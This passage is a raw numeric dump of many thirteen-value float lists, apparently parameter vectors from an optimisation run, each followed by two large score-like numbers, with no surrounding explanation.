4.855683396544643e-11, -1.4675478300173032e-10, -1.8130493256774034e-15,\n 8.765174154706532e-16, 2.5187119035976227e-05, -1.797858272312416e-06, \n -1.836034443165441e-08, 9.087619653117874e-10, 148433419780.93826, \n 110030788135.34956]\n[-8.372802930516975e-10, -1.3382357152930057e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.432701673757514e-10, -1.799249889019179e-15, \n 8.765174154706532e-16, 2.4802576523291093e-05, -1.7900208911755532e-06,\n -1.836034443165441e-08, 9.087619653117874e-10, 152744383578.88885, \n 111006224451.55664]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9475632661250835e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.815921924023075e-15,\n 8.83613368865103e-16, 2.4957985197946978e-05, -1.8015495121292713e-06, \n -1.8140174569754755e-08, 9.081976758127089e-10, 140660582328.68314, \n 113087422800.04585]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.815921924023075e-15,\n 8.763652695826297e-16, 2.4957985197946978e-05, -1.7900208911755532e-06,\n -1.836034443165441e-08, 9.081976758127089e-10, 148227079557.4723, \n 115101067854.69138]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.799249889019179e-15,\n 8.763652695826297e-16, 2.4957985197946978e-05, -1.7900208911755532e-06,\n -1.830053261436748e-08, 9.081976758127089e-10, 129686832886.01216, \n 126984206927.84627]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.869384519400452e-11, -1.4592095499147362e-10, -1.7864100157215748e-15,\n 8.706272486016714e-16, 2.5177177276929545e-05, -1.7997194394724915e-06,\n -1.850709631603352e-08, 9.087619653117874e-10, 188127979624.47858, \n 98138013390.26245]\n[-8.373514643167848e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.8139505305916955e-11, -1.4675478300173032e-10, -1.799249889019179e-15,\n 
8.783887938075847e-16, 2.4957985197946978e-05, -1.7900208911755532e-06,\n -1.836034443165441e-08, 9.035879148460716e-10, 195862055252.45816, \n 98829512345.71414]\n[-8.379785124926609e-10, -1.3292316984383345e-12, -1.955394873972143e-13, \n 4.852404641399239e-11, -1.4779126633130978e-10, -1.799249889019179e-15,\n 8.775397316555329e-16, 2.5049204386853816e-05, -1.7900208911755532e-06,\n -1.836034443165441e-08, 9.035879148460716e-10, 183972070969.05157, \n 98891303611.42876]\n[-8.373750609204521e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.869384519400452e-11, -1.4659424506650604e-10, -1.7864100157215748e-15,\n 8.706272486016714e-16, 2.492800478197597e-05, -1.7997194394724915e-06, \n -1.836034443165441e-08, 9.087619653117874e-10, 176341783374.723, \n 99638222233.03885]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4696825367906723e-10, -1.799249889019179e-15,\n 8.705169785374419e-16, 2.4957985197946978e-05, -1.8015495121292713e-06,\n -1.836034443165441e-08, 9.087619653117874e-10, 187303786818.71506, \n 99962477826.90034]\n[-8.29844666406642e-10, -1.3259182588069894e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.803543054789903e-15,\n 8.839563844754409e-16, 2.492800478197597e-05, -1.799557982850986e-06, -\n 1.836034443165441e-08, 9.081976758127089e-10, 190148608462.3526, \n 100180028793.6191]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9475632661250835e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.803543054789903e-15,\n 8.839563844754409e-16, 2.4907384876305387e-05, -1.799557982850986e-06, \n -1.836034443165441e-08, 9.081976758127089e-10, 192885903228.52237, \n 100290100926.3771]\n[-8.372802930516975e-10, -1.340114474894997e-12, -1.9475632661250835e-13, \n 4.852404641399239e-11, -1.4659424506650604e-10, -1.803543054789903e-15,\n 8.839563844754409e-16, 2.492800478197597e-05, -1.8015495121292713e-06, \n -1.836034443165441e-08, 
9.087619653117874e-10, 193159834117.98853, \n 100447140164.3877]\n[-8.45347775440883e-10, -1.3359785407261977e-12, -1.9409478257397567e-13, \n 4.852404641399239e-11, -1.463585775827913e-10, -1.812045689500589e-15, \n 8.706272486016714e-16, 2.4957985197946978e-05, -1.8015495121292713e-06,\n -1.836034443165441e-08, 9.087619653117874e-10, 192907161589.0385, \n 100872818268.9527]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.8130493256774034e-15,\n 8.705169785374419e-16, 2.4957985197946978e-05, -1.7997194394724915e-06,\n -1.836034443165441e-08, 9.087619653117874e-10, 183710210581.81177, \n 101076246798.6337]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.869384519400452e-11, -1.432701673757514e-10, -1.8130493256774034e-15,\n 8.765174154706532e-16, 2.542150809952725e-05, -1.7997194394724915e-06, \n -1.850709631603352e-08, 9.087619653117874e-10, 168715457724.7375, \n 101683114493.3993]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.849645416672899e-11, -1.432701673757514e-10, -1.803543054789903e-15, \n 8.765174154706532e-16, 2.5177177276929545e-05, -1.7997194394724915e-06,\n -1.836034443165441e-08, 9.087619653117874e-10, 153789626574.96255, \n 105699410466.83022]\n[-8.372802930516975e-10, -1.3398025228100945e-12, -1.9531413192683389e-13, \n 4.855683396544643e-11, -1.4675478300173032e-10, -1.803543054789903e-15,\n 8.714032924475303e-16, 2.4957985197946978e-05, -1.793948394990656e-06, \n -1.836034443165441e-08, 9.081976758127089e-10, 159560429502.34207, \n 105861289429.36061]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.869384519400452e-11, -1.432701673757514e-10, -1.7864100157215748e-15,\n 8.765174154706532e-16, 2.5177177276929545e-05, -1.7997194394724915e-06,\n -1.836034443165441e-08, 9.087619653117874e-10, 147461834890.53723, \n 106068644665.40553]\n[-8.372802930516975e-10, 
-1.3292316984383345e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4760843266911815e-10, -1.7864100157215748e-15,\n 8.706272486016714e-16, 2.492800478197597e-05, -1.7933608637070708e-06, \n -1.836034443165441e-08, 9.087979750822277e-10, 147793960453.4741, \n 109638154986.2024]\n[-8.29844666406642e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.8434260838579935e-11, -1.4561659265574012e-10, -1.819718397269023e-15,\n 8.775397316555329e-16, 2.4948775411850268e-05, -1.7900208911755532e-06,\n -1.836034443165441e-08, 9.081976758127089e-10, 150492287670.62976, \n 114344342719.97507]\n[-8.406587076953522e-10, -1.318355348076889e-12, -1.9519777560623135e-13, \n 4.855683396544643e-11, -1.4760843266911815e-10, -1.815921924023075e-15,\n 8.839563844754409e-16, 2.4957985197946978e-05, -1.7900208911755532e-06,\n -1.836034443165441e-08, 9.081976758127089e-10, 148227079557.78632, \n 115101067854.31332]\n[-8.389236670603421e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.799249889019179e-15,\n 8.717072130867646e-16, 2.4957985197946978e-05, -1.7900208911755532e-06,\n -1.836034443165441e-08, 9.087619653117874e-10, 137339476236.27339, \n 120797794814.05704]\n[-8.373514643167848e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.799249889019179e-15,\n 8.705169785374419e-16, 2.492800478197597e-05, -1.786297491730252e-06, -\n 1.836034443165441e-08, 9.087619653117874e-10, 128365631923.39072, \n 133721716481.47603]\n[-8.361552586353477e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.799249889019179e-15,\n 8.705169785374419e-16, 2.483403849637781e-05, -1.783565701728919e-06, -\n 1.836034443165441e-08, 9.095300241628919e-10, 123047993752.2489, \n 147005409641.27127]\n[-9.129396902499863e-10, -1.290047843436073e-12, -2.702634930634393e-13, \n 4.58556551164694e-11, -1.8724359625458014e-10, 
-2.1792166675464865e-15,\n 9.365717147446797e-16, 1.8994698205972217e-05, -1.8050933870374392e-06,\n -1.3360134446642706e-08, 8.693561802236366e-10, 169675879824.58978, \n 156722470654.13324]\n[6.303262263534727e-10, -1.2096663849982051e-12, -2.5988950272728827e-13, \n 4.701662665204773e-11, -1.4934765549498044e-10, -2.0495920936053975e-15,\n 8.502785255135087e-16, 1.8814769194136882e-05, -1.8050933870374392e-06,\n -1.3247752346374906e-08, 8.693561802236366e-10, 108072398467.48868, \n 167972224844.19583]\n[6.303262263534727e-10, -1.2096663849982051e-12, -2.5988950272728827e-13, \n 4.701662665204773e-11, -1.4986345441105813e-10, -2.0495920936053975e-15,\n 8.502785255135087e-16, 1.8814769194136882e-05, -1.8050933870374392e-06,\n -1.3247752346374906e-08, 8.693561802236366e-10, 108072398467.75635, \n 167972224843.92523]\n[-9.212545260772544e-10, -1.290047843436073e-12, -1.8356995493902235e-13, \n 4.58556551164694e-11, -1.8724359625458014e-10, -2.1913589342035502e-15,\n 9.365717147446797e-16, 1.9540146753875297e-05, -1.8050933870374392e-06,\n -1.3360134446642706e-08, 8.693561802236366e-10, 117723326371.03189, \n 192873830899.82352]\n[6.303262263534727e-10, -1.290047843436073e-12, -2.5988950272728827e-13, \n 4.58556551164694e-11, -1.4986345441105813e-10, -2.1913589342035502e-15,\n 8.502785255135087e-16, 1.8814769194136882e-05, -1.8050933870374392e-06,\n -1.3247752346374906e-08, 8.693561802236366e-10, 164354464752.25952, \n 160840990423.46024]\n[6.354744988103506e-10, -1.2096663849982051e-12, -1.830526663998671e-13, \n 4.6589669053151376e-11, -1.4986345441105813e-10, -\n 2.0495920936053975e-15, 8.502785255135087e-16, 1.894858193847651e-05, -\n 1.8050933870374392e-06, -1.3247752346374906e-08, 8.693561802236366e-10,\n 96467208837.94556, 179586543004.98117]\n[-9.212545260772544e-10, -1.290047843436073e-12, -1.8356995493902235e-13, \n 4.58556551164694e-11, -1.8580228849463816e-10, -2.1913589342035502e-15,\n 9.365717147446797e-16, 1.9540146753875297e-05, 
-1.8218396850604304e-06,\n -1.3360134446642706e-08, 8.759216763039946e-10, 117765020064.66293, \n 187118262382.8758]\n[-9.129396902499863e-10, -1.3004166005044262e-12, -1.8356995493902235e-13, \n 4.58556551164694e-11, -1.8724359625458014e-10, -2.1913589342035502e-15,\n 9.365717147446797e-16, 1.962681376929987e-05, -1.8050933870374392e-06, \n -1.3418860642065019e-08, 8.693561802236366e-10, 122674650037.46736, \n 187415567631.77402]\n[-9.212545260772544e-10, -1.2799153483071088e-12, -1.8213920664100724e-13, \n 4.58556551164694e-11, -1.8724359625458014e-10, -2.1913589342035502e-15,\n 9.365717147446797e-16, 1.9540146753875297e-05, -1.8050933870374392e-06,\n -1.3360134446642706e-08, 8.693561802236366e-10, 117723326371.03189, \n 192873830899.82352]\n[-9.212545260772544e-10, -1.290047843436073e-12, -1.8356995493902235e-13, \n 4.6154548476823616e-11, -1.8724359625458014e-10, -\n 2.1913589342035502e-15, 9.358479354640953e-16, 1.9540146753875297e-05, \n -1.8050933870374392e-06, -1.3360134446642706e-08, 8.693561802236366e-10,\n 117723326371.02731, 192873830899.82806]\n[2.2152115305769157e-10, -1.6907719215642795e-12, -2.5108769063589337e-13, \n 4.9793760275117476e-11, -2.0780774158604122e-10, -\n 2.1593626664102876e-15, 8.836470142939426e-16, 2.0200374650352852e-05, \n -1.7639524821935923e-06, -1.5013783998899997e-08, 8.77876424822685e-10,\n 170388218306.66492, 168925348515.4128]\n[2.2152115305769157e-10, -1.6907719215642795e-12, -2.1051647732787472e-13, \n 4.9793760275117476e-11, -2.0780774158604122e-10, -\n 2.1790706433018085e-15, 8.836470142939426e-16, 2.0343533479720338e-05, \n -1.7639524821935923e-06, -1.5091093694835327e-08, 8.771058818345121e-10,\n 191821821495.1242, 158798904598.69617]\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 5.011120217163613e-11, -1.7352085678160897e-10, -2.1593626664102876e-15,\n 8.836470142939426e-16, 2.0217203662255432e-05, -1.7639524821935923e-06,\n -1.5013783998899997e-08, 8.771058818345121e-10, 
177069079234.4985, \n 163375067226.8736]\n[2.213664545134999e-10, -1.2059133330572482e-12, -2.5108769063589337e-13, \n 5.011120217163613e-11, -1.7352085678160897e-10, -2.1593626664102876e-15,\n 8.836470142939426e-16, 2.0200374650352852e-05, -1.7639524821935923e-06,\n -1.508245699810314e-08, 8.771058818345121e-10, 197879714583.27084, \n 152444791757.7255]\n[0.0, -1.223723210207519e-12, -2.1051647732787472e-13, \n 4.971358693780409e-11, -1.7352085678160897e-10, -2.165433707987142e-15,\n 7.304553415989529e-16, 2.0047355685146273e-05, -1.7657604268720381e-06,\n -1.4977385439375226e-08, 8.771058818345121e-10, 197945074606.02325, \n 153164597685.87036]\n[2.2152115305769157e-10, -1.1984578022968498e-12, -2.5108769063589337e-13, \n 5.011120217163613e-11, -1.7352085678160897e-10, -1.8426407940693324e-15,\n 7.430575474541962e-16, 2.0200374650352852e-05, -1.7639524821935923e-06,\n -1.5202351660972107e-08, 8.771058818345121e-10, 111986329581.05826, \n 155849166742.8801]\n[2.2133713135172913e-10, -1.2059133330572482e-12, -2.5107145183244764e-13, \n 5.011120217163613e-11, -1.724660990140153e-10, -2.1790706433018085e-15,\n 8.836470142939426e-16, 2.0200374650352852e-05, -1.7639524821935923e-06,\n -1.5013783998899997e-08, 8.771058818345121e-10, 187269085984.5673, \n 161472427331.15216]\n[0.0, -1.223723210207519e-12, -2.094909506024221e-13, 5.011120217163613e-11,\n -1.7677981323511262e-10, -2.145058695065051e-15, 7.430575474541962e-16,\n 2.0053347897812537e-05, -1.7639524821935923e-06, -\n 1.4682044872577598e-08, 8.728626586100963e-10, 152433850624.54852, \n 175966043507.07343]\n[0.0, -1.223723210207519e-12, -2.1051647732787472e-13, \n 5.011120217163613e-11, -1.7352085678160897e-10, -2.1790706433018085e-15,\n 7.430575474541962e-16, 1.9918519209106862e-05, -1.7685796144533914e-06,\n -1.4682044872577598e-08, 8.771058818345121e-10, 153535961138.3572, \n 184829802626.36642]\n[2.2152115305769157e-10, -1.200937983572784e-12, -2.1065990049856794e-13, \n 5.011120217163613e-11, 
-1.7420072583381303e-10, -1.8426407940693324e-15,\n 7.454251311051652e-16, 2.0200374650352852e-05, -1.7639524821935923e-06,\n -1.508245699810314e-08, 8.771058818345121e-10, 92670242378.77588, \n 189416231139.84406]\n[0.0, -1.2207456906260254e-12, -2.1065990049856794e-13, \n 4.9793760275117476e-11, -2.0772853669541976e-10, -\n 1.8426407940693324e-15, 7.430575474541962e-16, 1.9867416915370552e-05, \n -1.7639524821935923e-06, -1.5091093694835327e-08, 8.728626586100963e-10,\n 160631139543.06137, 122019730569.7476]\n[2.2152115305769157e-10, -1.1984578022968498e-12, -2.1051647732787472e-13, \n 5.011120217163613e-11, -1.7677981323511262e-10, -1.857281675942834e-15,\n 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, \n -1.5202351660972107e-08, 8.771058818345121e-10, 153487531028.94116, \n 128597452665.91768]\n[0.0, -1.2031098015567e-12, -2.5161591646068603e-13, 5.011120217163613e-11,\n -1.7849498396021264e-10, -1.82610373802557e-15, 7.430575474541962e-16, \n 1.981538293869461e-05, -1.7639524821935923e-06, -1.5202351660972107e-08,\n 8.771058818345121e-10, 142632578694.80914, 130195065921.46504]\n[2.2152115305769157e-10, -1.2003583976149596e-12, -2.5108769063589337e-13, \n 5.011120217163613e-11, -1.7352085678160897e-10, -1.8426407940693324e-15,\n 7.430575474541962e-16, 2.0200374650352852e-05, -1.7639524821935923e-06,\n -1.517941226634992e-08, 8.771058818345121e-10, 107861636975.64659, \n 161449199082.99103]\n[0.0, -1.223723210207519e-12, -2.094909506024221e-13, 5.011120217163613e-11,\n -1.7677981323511262e-10, -1.857281675942834e-15, 7.430575474541962e-16,\n 1.981538293869461e-05, -1.769936435419886e-06, -1.4682044872577598e-08,\n 8.728626586100963e-10, 100156348461.68698, 161778485371.36353]\n[0.0, -1.1984578022968498e-12, -2.1065990049856794e-13, \n 5.011120217163613e-11, -1.7352085678160897e-10, -1.8426407940693324e-15,\n 7.430575474541962e-16, 2.0200374650352852e-05, -1.7639524821935923e-06,\n -1.5091093694835327e-08, 8.760544278271184e-10, 
100072993312.46272, \n 171303112707.4717]\n[2.2152115305769157e-10, -1.2071709641632366e-12, -2.088572649745598e-13, \n 4.9793760275117476e-11, -1.7352085678160897e-10, -\n 1.8261648304268637e-15, 8.836470142939426e-16, 2.0343533479720338e-05, \n -1.7639524821935923e-06, -1.5202351660972107e-08, 8.771058818345121e-10,\n 97245352689.07887, 174341101475.58182]\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 4.9675085987122204e-11, -1.7558160485557454e-10, -\n 1.8426407940693324e-15, 8.836470142939426e-16, 2.022642042947946e-05, -\n 1.7639524821935923e-06, -1.5013783998899997e-08, 8.750599822793858e-10,\n 92503635735.71886, 182996786041.40976]\n[0.0, -1.223723210207519e-12, -2.094909506024221e-13, 5.011120217163613e-11,\n -1.7677981323511262e-10, -2.1612081417375267e-15, 7.470344646267989e-16,\n 2.0053347897812537e-05, -1.7639524821935923e-06, -\n 1.4645406166689473e-08, 8.730660207999707e-10, 148185335900.70355, \n 185221791801.95062]\n[2.2111462065028517e-10, -1.2207456906260254e-12, -2.1065990049856794e-13, \n 5.056589741460715e-11, -1.7420072583381303e-10, -1.8426407940693324e-15,\n 7.454251311051652e-16, 2.0200374650352852e-05, -1.7639524821935923e-06,\n -1.508245699810314e-08, 8.771058818345121e-10, 92670242378.76936, \n 189416231139.85312]\n[2.2152115305769157e-10, -1.2207456906260254e-12, -2.1065990049856794e-13, \n 5.011120217163613e-11, -1.7420072583381303e-10, -1.8276902524925885e-15,\n 8.836470142939426e-16, 2.0200374650352852e-05, -1.7639524821935923e-06,\n -1.5091093694835327e-08, 8.771058818345121e-10, 90666406593.2125, \n 190153350507.14474]\n[2.2152115305769157e-10, -1.2049195466583994e-12, -2.1065990049856794e-13, \n 4.98075339514226e-11, -1.7558160485557454e-10, -1.8426407940693324e-15,\n 7.454251311051652e-16, 2.0095046248399238e-05, -1.7639524821935923e-06,\n -1.5013783998899997e-08, 8.771058818345121e-10, 89706134652.28279, \n 197738317572.1617]\n[0.0, -1.2031098015567e-12, -2.1065990049856794e-13, 
5.0102593857564815e-11,\n -1.7352085678160897e-10, -1.819039898810471e-15, 7.460417812765263e-16,\n 2.0200374650352852e-05, -1.7758673160173464e-06, -\n 1.5202351660972107e-08, 8.760544278271184e-10, 160476853944.9334, \n 119035825863.27417]\n[2.2152115305769157e-10, -1.2031098015567e-12, -2.5161591646068603e-13, \n 4.9793760275117476e-11, -1.7849498396021264e-10, -1.82610373802557e-15,\n 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, \n -1.5344868185414675e-08, 8.771058818345121e-10, 180743589801.84604, \n 120144468135.82727]\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 4.947687927376915e-11, -1.7558160485557454e-10, -1.8426407940693324e-15,\n 8.836470142939426e-16, 2.04140411384885e-05, -1.7639524821935923e-06, -\n 1.5078308038358913e-08, 8.683463468773267e-10, 146622662638.346, \n 120359956158.03543]\n[0.0, -1.1984578022968498e-12, -2.094909506024221e-13, \n 5.011120217163613e-11, -1.7352085678160897e-10, -1.857281675942834e-15,\n 7.430575474541962e-16, 2.0200374650352852e-05, -1.7813149517985466e-06,\n -1.5091093694835327e-08, 8.760544278271184e-10, 171477577754.58575, \n 120995758664.39177]\n[2.2152115305769157e-10, -1.1984578022968498e-12, -2.5108769063589337e-13, \n 4.9967768219433575e-11, -1.7352085678160897e-10, -\n 1.8426407940693324e-15, 7.430575474541962e-16, 2.0200374650352852e-05, \n -1.7639524821935923e-06, -1.5091093694835327e-08, 8.703632209100975e-10,\n 151029089477.88403, 121221447183.73479]\n[2.2152115305769157e-10, -1.2071709641632366e-12, -2.088572649745598e-13, \n 5.011120217163613e-11, -1.7352085678160897e-10, -1.8261648304268637e-15,\n 7.430575474541962e-16, 2.0343533479720338e-05, -1.7639524821935923e-06,\n -1.520980077906525e-08, 8.721578527250325e-10, 139696562348.4149, \n 123962248783.03809]\n[2.233355889138985e-10, -1.2031098015567e-12, -2.5108769063589337e-13, \n 5.011120217163613e-11, -1.7849498396021264e-10, -1.8426407940693324e-15,\n 7.430575474541962e-16, 
1.981538293869461e-05, -1.7639524821935923e-06, \n -1.5202351660972107e-08, 8.771058818345121e-10, 148301377250.4212, \n 129257349906.46594]\n[2.2152115305769157e-10, -1.2071709641632366e-12, -2.088572649745598e-13, \n 5.011120217163613e-11, -1.7352085678160897e-10, -1.8261648304268637e-15,\n 7.448076765658434e-16, 2.0200374650352852e-05, -1.7728642137544318e-06,\n -1.517941226634992e-08, 8.771058818345121e-10, 131981382341.97574, \n 129372470770.49553]\n[0.0, -1.2031098015567e-12, -2.088572649745598e-13, 5.011120217163613e-11, \n -1.7849498396021264e-10, -1.82610373802557e-15, 8.836470142939426e-16, \n 1.981538293869461e-05, -1.7639524821935923e-06, -1.5202351660972107e-08,\n 8.771058818345121e-10, 142632578694.80914, 130195065921.46504]\n[-5.2595470648843136e-09, -1.2003583976149596e-12, -2.5161591646068603e-13,\n 5.011120217163613e-11, -1.7461898455625076e-10, -1.8426407940693324e-15,\n 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, \n -1.517941226634992e-08, 8.771058818345121e-10, 142718091682.67987, \n 132029509845.4832]\n[2.2257852388875064e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 4.9793760275117476e-11, -1.7380412465809723e-10, -1.841021101878205e-15,\n 8.836470142939426e-16, 2.022642042947946e-05, -1.7639524821935923e-06, \n -1.5202351660972107e-08, 8.750599822793858e-10, 126150709659.35735, \n 137741348069.72827]\n[0.0, -1.2344709098355012e-12, -2.090479539659853e-13, \n 5.011120217163613e-11, -1.7849498396021264e-10, -1.857281675942834e-15,\n 7.485411998460075e-16, 1.981538293869461e-05, -1.769936435419886e-06, -\n 1.4682044872577598e-08, 8.711551918674385e-10, 114088676894.18327, \n 143862344272.2216]\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 5.011120217163613e-11, -1.7558160485557454e-10, -1.82610373802557e-15, \n 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, \n -1.5013783998899997e-08, 8.750599822793858e-10, 119621740814.33159, \n 
143868003797.30536]\n[2.2152115305769157e-10, -1.2003583976149596e-12, -2.088572649745598e-13, \n 4.995108013618423e-11, -1.7207960562590789e-10, -1.8426407940693324e-15,\n 8.836470142939426e-16, 2.015341505664753e-05, -1.7639524821935923e-06, \n -1.5202351660972107e-08, 8.771058818345121e-10, 115848531243.76457, \n 151496866956.06183]\n[7.878840270455085e-09, -1.2071709641632366e-12, -2.088572649745598e-13, \n 5.022894055850661e-11, -1.7352085678160897e-10, -1.8610445297760222e-15,\n 7.430575474541962e-16, 2.0343533479720338e-05, -1.7639524821935923e-06,\n -1.5202351660972107e-08, 8.760544278271184e-10, 113456911424.16617, \n 154679332976.7693]\n[0.0, -1.2031098015567e-12, -2.5161591646068603e-13, 5.011120217163613e-11,\n -1.7352085678160897e-10, -1.82610373802557e-15, 7.430575474541962e-16, \n 1.983133919352831e-05, -1.7639524821935923e-06, -1.500055802123721e-08,\n 8.760544278271184e-10, 107979663117.77498, 158587944243.3901]\n[2.2152115305769157e-10, -1.2003583976149596e-12, -2.5108769063589337e-13, \n 5.011120217163613e-11, -1.7352085678160897e-10, -1.8426407940693324e-15,\n 7.451496753853957e-16, 2.0200374650352852e-05, -1.7639524821935923e-06,\n -1.517941226634992e-08, 8.771058818345121e-10, 107861636975.64659, \n 161449199082.99103]\n[2.1977210438689425e-10, -1.2003583976149596e-12, -2.5108769063589337e-13, \n 5.011120217163613e-11, -1.7352085678160897e-10, -1.8426407940693324e-15,\n 8.836470142939426e-16, 2.0200374650352852e-05, -1.7639524821935923e-06,\n -1.517941226634992e-08, 8.771058818345121e-10, 107861636975.64659, \n 161449199082.99103]\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.099781497267347e-13, \n 4.9793760275117476e-11, -1.7558160485557454e-10, -\n 1.8426407940693324e-15, 8.836470142939426e-16, 2.0299458575301996e-05, \n -1.756844278469525e-06, -1.5202351660972107e-08, 8.750599822793858e-10,\n 101036412554.48618, 178952195751.12357]\n[0.0, -1.2071709641632366e-12, -2.088572649745598e-13, \n 4.9793760275117476e-11, 
-1.7352085678160897e-10, -\n 1.8426407940693324e-15, 8.836470142939426e-16, 2.0200374650352852e-05, \n -1.7587739009571313e-06, -1.5202351660972107e-08, 8.768692858683927e-10,\n 101115281125.52821, 181312381109.07834]\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 4.9675085987122204e-11, -1.7558160485557454e-10, -\n 1.8426407940693324e-15, 8.836470142939426e-16, 2.022642042947946e-05, -\n 1.7639524821935923e-06, -1.5013783998899997e-08, 8.750599822793858e-10,\n 92503635735.71886, 182996786041.40976]\n[2.2295275331941093e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 4.9675085987122204e-11, -1.7558160485557454e-10, -\n 1.8426407940693324e-15, 8.836470142939426e-16, 2.022642042947946e-05, -\n 1.7639524821935923e-06, -1.5013783998899997e-08, 8.750599822793858e-10,\n 92503635735.71886, 182996786041.40976]\n[0.0, -1.223723210207519e-12, -2.1065990049856794e-13, \n 5.011120217163613e-11, -1.7707453284878416e-10, -1.866210682668369e-15,\n 7.430575474541962e-16, 1.9722774245768875e-05, -1.769936435419886e-06, \n -1.4682044872577598e-08, 8.760544278271184e-10, 88317753591.74515, \n 193403737351.61066]\n[2.2152115305769157e-10, -1.2071709641632366e-12, -2.5161591646068603e-13, \n 5.011120217163613e-11, -1.7352085678160897e-10, -1.8261648304268637e-15,\n 7.430575474541962e-16, 2.0343533479720338e-05, -1.7493239251088378e-06,\n -1.5085870105283375e-08, 8.701394499644777e-10, 90763281590.1167, \n 199093039398.6542]\n[2.2152115305769157e-10, -1.2071709641632366e-12, -2.088572649745598e-13, \n 5.011120217163613e-11, -1.7352085678160897e-10, -1.857281675942834e-15,\n 7.387655049943961e-16, 1.981538293869461e-05, -1.769936435419886e-06, -\n 1.4563889985865401e-08, 8.644597543611974e-10, 157634872361.7637, \n 120593643708.66519]\n[2.2257852388875064e-10, -1.2070230966272908e-12, -2.1051647732787472e-13, \n 5.027931250826744e-11, -1.755220169767042e-10, -1.810973414699955e-15, \n 7.430575474541962e-16, 1.981538293869461e-05, 
-1.7639524821935923e-06, \n -1.5202351660972107e-08, 8.750599822793858e-10, 159354716917.0895, \n 121269083493.68436]\n[0.0, -1.2031098015567e-12, -2.090479539659853e-13, 5.011120217163613e-11, \n -1.7352085678160897e-10, -1.8577367523496564e-15, 7.430575474541962e-16,\n 1.9814643005749893e-05, -1.7639524821935923e-06, -1.500055802123721e-08,\n 8.711551918674385e-10, 168378423128.42877, 121439949900.90005]\n[2.198369754018213e-10, -1.2071709641632366e-12, -2.088572649745598e-13, \n 5.011120217163613e-11, -1.7513929529124395e-10, -1.82610373802557e-15, \n 7.448076765658434e-16, 2.0042195789951223e-05, -1.7728642137544318e-06,\n -1.5013783998899997e-08, 8.734593739302048e-10, 147068576327.25705, \n 122027384226.92]\n[2.2257852388875064e-10, -1.2059133330572482e-12, -2.090479539659853e-13, \n 4.9793760275117476e-11, -1.7849498396021264e-10, -1.841021101878205e-15,\n 7.556782953802372e-16, 2.022642042947946e-05, -1.769936435419886e-06, -\n 1.5202351660972107e-08, 8.750599822793858e-10, 149871632956.7388, \n 122750625888.09634]\n[2.2152115305769157e-10, -1.2344709098355012e-12, -2.1013781830316155e-13, \n 5.011120217163613e-11, -1.7343044399460855e-10, -1.857281675942834e-15,\n 7.430575474541962e-16, 2.0343113714890682e-05, -1.7639524821935923e-06,\n -1.520980077906525e-08, 8.721578527250325e-10, 151082881535.07886, \n 122935226427.98189]\n[2.2152115305769157e-10, -1.2071709641632366e-12, -2.088572649745598e-13, \n 5.011120217163613e-11, -1.7352085678160897e-10, -1.8261648304268637e-15,\n 7.430575474541962e-16, 2.0343533479720338e-05, -1.7639524821935923e-06,\n -1.520980077906525e-08, 8.721578527250325e-10, 139696562348.4149, \n 123962248783.03809]\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 5.011120217163613e-11, -1.7380412465809723e-10, -1.82610373802557e-15, \n 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, \n -1.5013783998899997e-08, 8.735477478457909e-10, 133427418313.38545, \n 
